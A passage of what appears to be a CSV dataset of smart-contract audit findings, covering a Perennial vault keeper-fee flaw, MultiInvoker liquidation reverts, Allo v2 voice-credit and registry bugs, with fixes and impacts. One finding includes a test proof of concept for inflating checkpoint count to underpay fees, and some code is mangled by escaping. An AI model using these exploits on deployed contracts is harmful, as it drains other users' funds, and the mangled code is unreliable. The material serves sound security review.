revert VaultExistingOrderError();\\n```\\n\\nIt then calculates amount to claim by calling _socialize:\\n```\\n// asses socialization and settlement fee\\nUFixed6 claimAmount = _socialize(context, depositAssets, redeemShares, claimAssets);\\n// rest of code\\nfunction _socialize(\\n Context memory context,\\n UFixed6 depositAssets,\\n UFixed6 redeemShares,\\n UFixed6 claimAssets\\n) private view returns (UFixed6 claimAmount) {\\n // @audit global assets must be 0 to make (0,0,0) pass this function\\n if (context.global.assets.isZero()) return UFixed6Lib.ZERO;\\n UFixed6 totalCollateral = UFixed6Lib.from(_collateral(context).max(Fixed6Lib.ZERO));\\n claimAmount = claimAssets.muldiv(totalCollateral.min(context.global.assets), context.global.assets);\\n\\n // @audit for (0,0,0) this will revert (underflow)\\n if (depositAssets.isZero() && redeemShares.isZero()) claimAmount = claimAmount.sub(context.settlementFee);\\n}\\n```\\n\\n`_socialize` will immediately return 0 if `context.global.assets == 0`. If `context.global.assets > 0`, then this function will revert in the last line due to underflow (trying to subtract `settlementFee` from 0 claimAmount)\\nThis is the condition for this issue to happen: global assets must be 0. Global assets are the amounts redeemed but not yet claimed by users. So this can reasonably happen in the first days of the vault life, when users mostly only deposit, or claim everything they withdraw.\\nOnce this function passes, the following lines increase checkpoint.count:\\n```\\n// update positions\\ncontext.global.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.local.update(context.currentId, claimAssets, redeemShares, depositAssets, redeemShares);\\ncontext.currentCheckpoint.update(depositAssets, redeemShares);\\n// rest of code\\n// Checkpoint library:\\n// rest of code\\nfunction update(Checkpoint memory self, UFixed6 deposit, UFixed6 redemption) internal pure {\\n (self.deposit, self.redemption) = (self.deposit.add(deposit), self.redemption.add(redemption));\\n self.count++;\\n}\\n```\\n\\nThe rest of the function executes normally.\\nDuring position settlement, pending user deposits and redeems are reduced by the keeper fees / checkpoint.count:\\n```\\n// Account library:\\n// rest of code\\nfunction processLocal(\\n Account memory self,\\n uint256 latestId,\\n Checkpoint memory checkpoint,\\n UFixed6 deposit,\\n UFixed6 redemption\\n) internal pure {\\n self.latest = latestId;\\n (self.assets, self.shares) = (\\n self.assets.add(checkpoint.toAssetsLocal(redemption)),\\n self.shares.add(checkpoint.toSharesLocal(deposit))\\n );\\n (self.deposit, self.redemption) = (self.deposit.sub(deposit), self.redemption.sub(redemption));\\n}\\n// rest of code\\n// Checkpoint library\\n// toAssetsLocal / toSharesLocal calls _withoutKeeperLocal to calculate keeper fees:\\n// rest of code\\n function _withoutKeeperLocal(Checkpoint memory self, UFixed6 amount) private pure returns (UFixed6) {\\n UFixed6 keeperPer = self.count == 0 ? UFixed6Lib.ZERO : self.keeper.div(UFixed6Lib.from(self.count));\\n return _withoutKeeper(amount, keeperPer);\\n }\\n```\\n\\nAlso notice that in `processLocal` the only thing which keeper fees influence are deposits and redemptions, but not claims.\\nThe scenario above is demonstrated in the test, add this to Vault.test.ts:\\n```\\nit('inflate checkpoint count', async () => {\\n const settlementFee = parse6decimal('10.00')\\n const marketParameter = { // rest of code(await market.parameter()) }\\n marketParameter.settlementFee = settlementFee\\n await market.connect(owner).updateParameter(marketParameter)\\n const btcMarketParameter = { // rest of code(await btcMarket.parameter()) }\\n btcMarketParameter.settlementFee = settlementFee\\n await btcMarket.connect(owner).updateParameter(btcMarketParameter)\\n\\n const deposit = parse6decimal('10000')\\n await vault.connect(user).update(user.address, deposit, 0, 0)\\n await updateOracle()\\n await vault.settle(user.address)\\n\\n const deposit2 = parse6decimal('10000')\\n await vault.connect(user2).update(user2.address, deposit2, 0, 0)\\n\\n // inflate checkpoint.count\\n await vault.connect(btcUser1).update(btcUser1.address, 0, 0, 0)\\n await vault.connect(btcUser2).update(btcUser2.address, 0, 0, 0)\\n\\n await updateOracle()\\n await vault.connect(user2).settle(user2.address)\\n\\n const checkpoint2 = await vault.checkpoints(3)\\n console.log(""checkpoint count = "" + checkpoint2.count)\\n\\n var account = await vault.accounts(user.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log(""User shares:"" + account.shares + "" assets: "" + assets);\\n var account = await vault.accounts(user2.address);\\n var assets = await vault.convertToAssets(account.shares);\\n console.log(""User2 shares:"" + account.shares + "" assets: "" + assets);\\n})\\n```\\n\\nConsole output:\\n```\\ncheckpoint count = 3\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:10013140463 assets: 10003346584\\n```\\n\\nSo the user2 inflates his deposited amounts by paying smaller keeper fee.\\nIf 2 lines which inflate checkpoint count (after corresponding comment) are deleted, then the output is:\\n```\\ncheckpoint count = 1\\nUser shares:10000000000 assets: 9990218973\\nUser2 shares:9999780702 assets: 9989999890\\n```\\n\\nSo if not inflated, user2 pays correct amount and has roughly the same assets as user1 after his deposit.","Consider reverting (0,0,0) vault updates, or maybe redirecting to `settle` in this case. Additionally, consider updating checkpoint only if `depositAssets` or `redeemShares` are not zero:\\n```\\nif (!depositAssets.isZero() || !redeemShares.isZero())\\n context.currentCheckpoint.update(depositAssets, redeemShares);\\n```\\n",Malicious vault user can inflate `checkpoint.count` to pay much smaller keeper fee than they should at the expense of the other vault users.,"```\\n// invariant\\n// @audit operator - pass\\nif (msg.sender != account && !IVaultFactory(address(factory())).operators(account, msg.sender))\\n revert VaultNotOperatorError();\\n// @audit 0,0,0 is single-sided - pass\\nif (!depositAssets.add(redeemShares).add(claimAssets).eq(depositAssets.max(redeemShares).max(claimAssets)))\\n revert VaultNotSingleSidedError();\\n// @audit depositAssets == 0 - pass\\nif (depositAssets.gt(_maxDeposit(context)))\\n revert VaultDepositLimitExceededError();\\n// @audit redeemShares == 0 - pass\\nif (redeemShares.gt(_maxRedeem(context)))\\n revert VaultRedemptionLimitExceededError();\\n// @audit depositAssets == 0 - pass\\nif (!depositAssets.isZero() && depositAssets.lt(context.settlementFee))\\n revert VaultInsufficientMinimumError();\\n// @audit redeemShares == 0 - pass\\nif (!redeemShares.isZero() && context.latestCheckpoint.toAssets(redeemShares, context.settlementFee).isZero())\\n revert VaultInsufficientMinimumError();\\n// @audit since this will be called by **different** users in the same epoch, this will also pass\\nif (context.local.current != context.local.latest) revert VaultExistingOrderError();\\n```\\n" +MultiInvoker liquidation action will revert most of the time due to incorrect closable amount initialization,medium,"`MultiInvoker` calculates the `closable` amount in its `_latest` function incorrectly. In particular, it doesn't initialize `closableAmount`, so it's set to 0 initially. It then scans pending positions, settling those which should be settled, and reducing `closableAmount` if necessary for remaining pending positions:\\n```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n\\nNotice, that `closableAmount` is initialized to `previousMagnitude` only if there is at least one position that needs to be settled. However, if `local.latestId == local.currentId` (which is the case for most of the liquidations - position becomes liquidatable due to price changes without any pending positions created by the user), this loop is skipped entirely, never setting `closableAmount`, so it's incorrectly returned as 0, although it's not 0 (it should be the latest settled position magnitude).\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\n","Initialize `closableAmount` to previousMagnitude:\\n```\\n function _latest(\\n IMarket market,\\n address account\\n ) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n+ closableAmount = previousMagnitude;\\n```\\n","All `MultiInvoker` liquidation actions will revert if trying to liquidate users without positions which can be settled, which can happen in 2 cases:\\nLiquidated user doesn't have any pending positions at all (local.latestId == local.currentId). This is the most common case (price has changed and user is liquidated without doing any actions) and we can reasonably expect that this will be the case for at least 50% of liquidations (probably more, like 80-90%).\\nLiquidated user does have pending positions, but no pending position is ready to be settled yet. For example, if liquidator commits unrequested oracle version which liquidates user, even if the user already has pending position (but which is not yet ready to be settled).\\nSince this breaks important `MultiInvoker` functionality in most cases and causes loss of funds to liquidator (revert instead of getting liquidation fee), I believe this should be High severity.","```\\nfunction _latest(\\n IMarket market,\\n address account\\n) internal view returns (Position memory latestPosition, Fixed6 latestPrice, UFixed6 closableAmount) {\\n // load parameters from the market\\n IPayoffProvider payoff = market.payoff();\\n\\n // load latest settled position and price\\n uint256 latestTimestamp = market.oracle().latest().timestamp;\\n latestPosition = market.positions(account);\\n latestPrice = market.global().latestPrice;\\n UFixed6 previousMagnitude = latestPosition.magnitude();\\n\\n // @audit-issue Should add:\\n // closableAmount = previousMagnitude;\\n // otherwise if no position is settled in the following loop, closableAmount incorrectly remains 0\\n\\n // scan pending position for any ready-to-be-settled positions\\n Local memory local = market.locals(account);\\n for (uint256 id = local.latestId + 1; id <= local.currentId; id++) {\\n\\n // load pending position\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n latestPosition.update(pendingPosition);\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n@@@ closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n }\\n}\\n```\\n" +MultiInvoker liquidation action will revert due to incorrect closable amount calculation for invalid oracle versions,medium,"`MultiInvoker` calculates the `closable` amount in its `_latest` function. This function basically repeats the logic of `Market._settle`, but fails to repeat it correctly for the invalid oracle version settlement. When invalid oracle version is settled, `latestPosition` invalidation should increment, but the `latestPosition` should remain the same. This is achieved in the `Market._processPositionLocal` by adjusting `newPosition` after invalidation before the `latestPosition` is set to newPosition:\\n```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n\\nHowever, `MultiInvoker` doesn't adjust the new position and simply sets `latestPosition` to new position both when oracle is valid or invalid:\\n```\\nif (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\nlatestPosition.update(pendingPosition);\\n```\\n\\nThis leads to incorrect value of `closableAmount` afterwards:\\n```\\npreviousMagnitude = latestPosition.magnitude();\\nclosableAmount = previousMagnitude;\\n```\\n\\nFor example, if `latestPosition.market = 10`, `pendingPosition.market = 0` and pendingPosition has invalid oracle, then:\\n`Market` will invalidate (latestPosition.invalidation.market = 10), adjust (pendingPosition.market = 10), set `latestPosition` to new `pendingPosition` (latestPosition.maker = pendingPosition.maker = 10), so `latestPosition.maker` correctly remains 10.\\n`MultiInvoker` will invalidate (latestPosition.invalidation.market = 10), and immediately set `latestPosition` to `pendingPosition` (latestPosition.maker = pendingPosition.maker = 0), so `latestPosition.maker` is set to 0 incorrectly.\\nSince `LIQUIDATE` action of `MultiInvoker` uses `_latest` to calculate `closableAmount` and `liquidationFee`, these values will be calculated incorrectly and will revert when trying to update the market. See the `_liquidate` market update reducing `currentPosition` by `closable` (which is 0 when it must be bigger):\\n```\\nmarket.update(\\n account,\\n currentPosition.maker.isZero() ? UFixed6Lib.ZERO : currentPosition.maker.sub(closable),\\n currentPosition.long.isZero() ? UFixed6Lib.ZERO : currentPosition.long.sub(closable),\\n currentPosition.short.isZero() ? UFixed6Lib.ZERO : currentPosition.short.sub(closable),\\n Fixed6Lib.from(-1, liquidationFee),\\n true\\n);\\n```\\n\\nThis line will revert because `Market._invariant` verifies that `closableAmount` must be 0 after updating liquidated position:\\n```\\nif (protected && (\\n@@@ !closableAmount.isZero() ||\\n context.latestPosition.local.maintained(\\n context.latestVersion,\\n context.riskParameter,\\n collateralAfterFees.sub(collateral)\\n ) ||\\n collateral.lt(Fixed6Lib.from(-1, _liquidationFee(context, newOrder)))\\n)) revert MarketInvalidProtectionError();\\n```\\n","Both `Market` and `MultiInvoker` handle position settlement for invalid oracle versions incorrectly (Market issue with this was reported separately as it's completely different), so both should be fixed and the fix of this one will depend on how the `Market` bug is fixed. The way it is, `MultiInvoker` correctly adjusts pending position before invalidating `latestPosition` (which `Market` fails to do), however after such action `pendingPosition` must not be adjusted, because it was already adjusted and new adjustment should only change it by the difference from the last invalidation. The easier solution would be just not to change `latestPosition` in case of invalid oracle version, so the fix might be like this (just add else):\\n```\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n else latestPosition.update(pendingPosition);\\n```\\n\\nHowever, if the `Market` bug is fixed the way I proposed it (by changing `invalidate` function to take into account difference in invalidation of `latestPosition` and pendingPosition), then this fix will still be incorrect, because `invalidate` will expect unadjusted `pendingPosition`, so in this case `pendingPosition` should not be adjusted after loading it, but it will have to be adjusted for positions not yet settled. So the fix might look like this:\\n```\\n Position memory pendingPosition = market.pendingPositions(account, id);\\n- pendingPosition.adjust(latestPosition);\\n\\n // load oracle version for that position\\n OracleVersion memory oracleVersion = market.oracle().at(pendingPosition.timestamp);\\n if (address(payoff) != address(0)) oracleVersion.price = payoff.payoff(oracleVersion.price);\\n\\n // virtual settlement\\n if (pendingPosition.timestamp <= latestTimestamp) {\\n if (!oracleVersion.valid) latestPosition.invalidate(pendingPosition);\\n- latestPosition.update(pendingPosition);\\n+ else {\\n+ pendingPosition.adjust(latestPosition);\\n+ latestPosition.update(pendingPosition);\\n+ }\\n if (oracleVersion.valid) latestPrice = oracleVersion.price;\\n\\n previousMagnitude = latestPosition.magnitude();\\n closableAmount = previousMagnitude;\\n\\n // process pending positions\\n } else {\\n+ pendingPosition.adjust(latestPosition);\\n closableAmount = closableAmount\\n .sub(previousMagnitude.sub(pendingPosition.magnitude().min(previousMagnitude)));\\n previousMagnitude = latestPosition.magnitude();\\n }\\n```\\n","If there is an invalid oracle version during pending position settlement in `MultiInvoker` liquidation action, it will incorrectly revert and will cause loss of funds for the liquidator who should have received liquidation fee, but reverts instead.\\nSince this breaks important `MultiInvoker` functionality in some rare edge cases (invalid oracle version, user has unsettled position which should settle during user liquidation with `LIQUIDATION` action of MultiInvoker), this should be a valid medium finding.",```\\nif (!version.valid) context.latestPosition.local.invalidate(newPosition);\\nnewPosition.adjust(context.latestPosition.local);\\n// rest of code\\ncontext.latestPosition.local.update(newPosition);\\n```\\n +Invalid oracle version can cause the vault to open too large and risky position and get liquidated due to using unadjusted global current position,medium,"`StrategyLib._loadContext` for the market loads `currentPosition` as:\\n```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n\\nHowever, this is unadjusted position, so its value is incorrect if invalid oracle version happens while this position is pending.\\nLater on, when calculating minimum and maxmium positions enforced by the vault in the market, they're calculated in _positionLimit:\\n```\\nfunction _positionLimit(MarketContext memory context) private pure returns (UFixed6, UFixed6) {\\n return (\\n // minimum position size before crossing the net position\\n context.currentAccountPosition.maker.sub(\\n context.currentPosition.maker\\n .sub(context.currentPosition.net().min(context.currentPosition.maker))\\n .min(context.currentAccountPosition.maker)\\n .min(context.closable)\\n ),\\n // maximum position size before crossing the maker limit\\n context.currentAccountPosition.maker.add(\\n context.riskParameter.makerLimit\\n .sub(context.currentPosition.maker.min(context.riskParameter.makerLimit))\\n )\\n );\\n}\\n```\\n\\nAnd the target maker size for the market is set in allocate:\\n```\\n(targets[marketId].collateral, targets[marketId].position) = (\\n Fixed6Lib.from(_locals.marketCollateral).sub(contexts[marketId].local.collateral),\\n _locals.marketAssets\\n .muldiv(registrations[marketId].leverage, contexts[marketId].latestPrice.abs())\\n .min(_locals.maxPosition)\\n .max(_locals.minPosition)\\n);\\n```\\n\\nSince `context.currentPosition` is incorrect, it can happen that both `_locals.minPosition` and `_locals.maxPosition` are too high, the vault will open too large and risky position, breaking its risk limit and possibly getting liquidated, especially if it happens during high volatility.",Adjust global current position after loading it:\\n```\\n context.currentPosition = registration.market.pendingPosition(global.currentId);\\n+ context.currentPosition.adjust(registration.market.position());\\n```\\n,"If invalid oracle version happens, the vault might open too large and risky position in such market, potentially getting liquidated and vault users losing funds due to this liquidation.",```\\ncontext.currentPosition = registration.market.pendingPosition(global.currentId);\\n```\\n +`QVSimpleStrategy` never updates `allocator.voiceCredits`.,high,"```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n\\n```\\n function _hasVoiceCreditsLeft(uint256 _voiceCreditsToAllocate, uint256 _allocatedVoiceCredits)\\n internal\\n view\\n override\\n returns (bool)\\n {\\n return _voiceCreditsToAllocate + _allocatedVoiceCredits <= maxVoiceCreditsPerAllocator;\\n }\\n```\\n\\nThe problem is that `allocator.voiceCredits` is always zero. Both `QVSimpleStrategy` and `QVBaseStrategy` don't update `allocator.voiceCredits`. Thus, allocators can cast more votes than `maxVoiceCreditsPerAllocator`.","Updates `allocator.voiceCredits` in `QVSimpleStrategy._allocate`.\\n```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n// Add the line below\\n allocator.voiceCredits // Add the line below\\n= voiceCreditsToAllocate;\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n",Every allocator has an unlimited number of votes.,"```\\n function _allocate(bytes memory _data, address _sender) internal virtual override {\\n …\\n\\n // check that the recipient has voice credits left to allocate\\n if (!_hasVoiceCreditsLeft(voiceCreditsToAllocate, allocator.voiceCredits)) revert INVALID();\\n\\n _qv_allocate(allocator, recipient, recipientId, voiceCreditsToAllocate, _sender);\\n }\\n```\\n" +`recipientsCounter` should start from 1 in `DonationVotingMerkleDistributionBaseStrategy`,high,"```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n\\n```\\n function _getUintRecipientStatus(address _recipientId) internal view returns (uint8 status) {\\n // Get the column index and current row\\n (, uint256 colIndex, uint256 currentRow) = _getStatusRowColumn(_recipientId);\\n\\n // Get the status from the 'currentRow' shifting by the 'colIndex'\\n status = uint8((currentRow colIndex) & 15);\\n\\n // Return the status\\n return status;\\n }\\n```\\n\\n```\\n function _getStatusRowColumn(address _recipientId) internal view returns (uint256, uint256, uint256) {\\n uint256 recipientIndex = recipientToStatusIndexes[_recipientId];\\n\\n uint256 rowIndex = recipientIndex / 64; // 256 / 4\\n uint256 colIndex = (recipientIndex % 64) * 4;\\n\\n return (rowIndex, colIndex, statusesBitMap[rowIndex]);\\n }\\n```\\n\\n```\\n /// @notice The total number of recipients.\\n uint256 public recipientsCounter;\\n```\\n\\nConsider the following situation:\\nAlice is the first recipient calls `registerRecipient`\\n```\\n// in _registerRecipient\\nrecipientToStatusIndexes[Alice] = recipientsCounter = 0;\\n_setRecipientStatus(Alice, uint8(Status.Pending));\\nrecipientCounter++\\n```\\n\\nBob calls `registerRecipient`.\\n```\\n// in _getStatusRowColumn\\nrecipientToStatusIndexes[Bob] = 0 // It would access the status of Alice\\n// in _registerRecipient\\ncurrentStatus = _getUintRecipientStatus(recipientId) = Status.Pending\\ncurrentStatus != uint8(Status.None) -> no new application is recorded in the pool.\\n```\\n\\nThis implementation error makes the pool can only record the first application.","Make the counter start from 1. There are two methods to fix the issue.\\n\\n```\\n /// @notice The total number of recipients.\\n// Add the line below\\n uint256 public recipientsCounter;\\n// Remove the line below\\n uint256 public recipientsCounter;\\n```\\n\\n\\n```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n// Add the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter // Add the line below\\n 1;\\n// Remove the line below\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter// Add the line below\\n// Add the line below\\n;\\n …\\n }\\n```\\n",,"```\\n function _registerRecipient(bytes memory _data, address _sender)\\n internal\\n override\\n onlyActiveRegistration\\n returns (address recipientId)\\n {\\n …\\n\\n uint8 currentStatus = _getUintRecipientStatus(recipientId);\\n\\n if (currentStatus == uint8(Status.None)) {\\n // recipient registering new application\\n recipientToStatusIndexes[recipientId] = recipientsCounter;\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n\\n bytes memory extendedData = abi.encode(_data, recipientsCounter);\\n emit Registered(recipientId, extendedData, _sender);\\n\\n recipientsCounter++;\\n } else {\\n if (currentStatus == uint8(Status.Accepted)) {\\n // recipient updating accepted application\\n _setRecipientStatus(recipientId, uint8(Status.Pending));\\n } else if (currentStatus == uint8(Status.Rejected)) {\\n // recipient updating rejected application\\n _setRecipientStatus(recipientId, uint8(Status.Appealed));\\n }\\n emit UpdatedRegistration(recipientId, _data, _sender, _getUintRecipientStatus(recipientId));\\n }\\n }\\n```\\n" +`Registry.sol` generate clone `Anchor.sol` never work. Profile owner cannot use their `Anchor` wallet,high,"Add this test to `Registry.t.sol` test file to reproduce the issue.\\n```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log(""registry address: %s"", address(registry()));\\n console.log(""anchor address: %s"", profile.anchor);\\n console.log(""anchor.registry: %s"", address(_anchor.registry()));\\n\\n emit log_named_bytes32(""profile.id"", profile.id);\\n emit log_named_bytes32(""anchor.profile.id"", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,""wrong anchor registry"");\\n }\\n```\\n\\nWhat happen with `Anchor.sol` is it expect `msg.sender` is `Registry` contract. But in reality `msg.sender` is a proxy contract generated by Solady during `CREATE3` operation.\\n```\\n constructor(bytes32 _profileId) {\\n registry = Registry(msg.sender);//@audit H Registry address here is not Registry. msg.sender is a proxy contract. Create3 deploy 2 contract. one is proxy. other is actual bytecode.\\n profileId = _profileId;\\n }\\n```\\n\\nThis can be seen with Solady comment for proxy contract. `msg.sender` above is middleman proxy contract. Not `Registry` contract. Solady generate 2 contract during CREATE3 operation. One is proxy contract. Second is actual bytecode.","Move `msg.sender` into constructor parameter\\n```\\nFile: allo-v2\\contracts\\core\\Registry.sol\\n bytes memory creationCode = abi.encodePacked(type(Anchor).creationCode, abi.encode(_profileId, address(this))); //@audit fix creation code\\n\\n // Use CREATE3 to deploy the anchor contract\\n anchor = CREATE3.deploy(salt, creationCode, 0); \\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n constructor(bytes32 _profileId, address _registry) {\\n registry = Registry(_registry);\\n profileId = _profileId;\\n }\\n```\\n","`Anchor.execute()` function will not work because `registry` address point to empty proxy contract and not actual `Registry` so all call will revert.\\n```\\nFile: allo-v2\\contracts\\core\\Anchor.sol\\n function execute(address _target, uint256 _value, bytes memory _data) external returns (bytes memory) {\\n // Check if the caller is the owner of the profile and revert if not\\n if (!registry.isOwnerOfProfile(profileId, msg.sender)) revert UNAUTHORIZED();\\n```\\n\\nProfile owner cannot use their wallet `Anchor`. All funds send to this `Anchor` contract will be lost forever.","```\\n function test_Audit_createProfile() public {\\n // create profile\\n bytes32 newProfileId = registry().createProfile(nonce, name, metadata, profile1_owner(), profile1_members());\\n Registry.Profile memory profile = registry().getProfileById(newProfileId);\\n Anchor _anchor = Anchor(payable(profile.anchor));\\n\\n console.log(""registry address: %s"", address(registry()));\\n console.log(""anchor address: %s"", profile.anchor);\\n console.log(""anchor.registry: %s"", address(_anchor.registry()));\\n\\n emit log_named_bytes32(""profile.id"", profile.id);\\n emit log_named_bytes32(""anchor.profile.id"", _anchor.profileId());\\n\\n Anchor _anchor_proxy = Anchor(payable(address( _anchor.registry())));\\n assertEq(address(registry()),address(_anchor.registry()) ,""wrong anchor registry"");\\n }\\n```\\n" +`fundPool` does not work with fee-on-transfer token,medium,"In `_fundPool`, the parameter for `increasePoolAmount` is directly the amount used in the `transferFrom` call.\\n```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n\\nWhen `_token` is a fee-on-transfer token, the actual amount transferred to `_strategy` will be less than `amountAfterFee`. Therefore, the current approach could lead to a recorded balance that is greater than the actual balance.",Use the change in `_token` balance as the parameter for `increasePoolAmount`.,`fundPool` does not work with fee-on-transfer token,"```\\n _transferAmountFrom(_token, TransferData({from: msg.sender, to: address(_strategy), amount: amountAfterFee}));\\n _strategy.increasePoolAmount(amountAfterFee);\\n```\\n" +Exponential Inflation of Voice Credits in Quadratic Voting Strategy,medium,"In the given code snippet, we observe a potential issue in the way voice credits are being accumulated for each recipient. The specific lines of code in question are:\\n```\\nfunction _qv_allocate(\\n // rest of code\\n ) internal onlyActiveAllocation {\\n // rest of code\\n uint256 creditsCastToRecipient = _allocator.voiceCreditsCastToRecipient[_recipientId];\\n // rest of code\\n // get the total credits and calculate the vote result\\n uint256 totalCredits = _voiceCreditsToAllocate + creditsCastToRecipient;\\n // rest of code\\n //E update allocator mapping voice for this recipient\\n _allocator.voiceCreditsCastToRecipient[_recipientId] += totalCredits; //E @question should be only _voiceCreditsToAllocate\\n // rest of code\\n }\\n```\\n\\nWe can see that at the end :\\n```\\n_allocator.voiceCreditsCastToRecipient[_recipientId] = _allocator.voiceCreditsCastToRecipient[_recipientId] + _voiceCreditsToAllocate + _allocator.voiceCreditsCastToRecipient[_recipientId];\\n```\\n\\nHere, totalCredits accumulates both the newly allocated voice credits (_voiceCreditsToAllocate) and the credits previously cast to this recipient (creditsCastToRecipient). Later on, this totalCredits is added again to `voiceCreditsCastToRecipient[_recipientId]`, thereby including the previously cast credits once more\\nProof of Concept (POC):\\nLet's consider 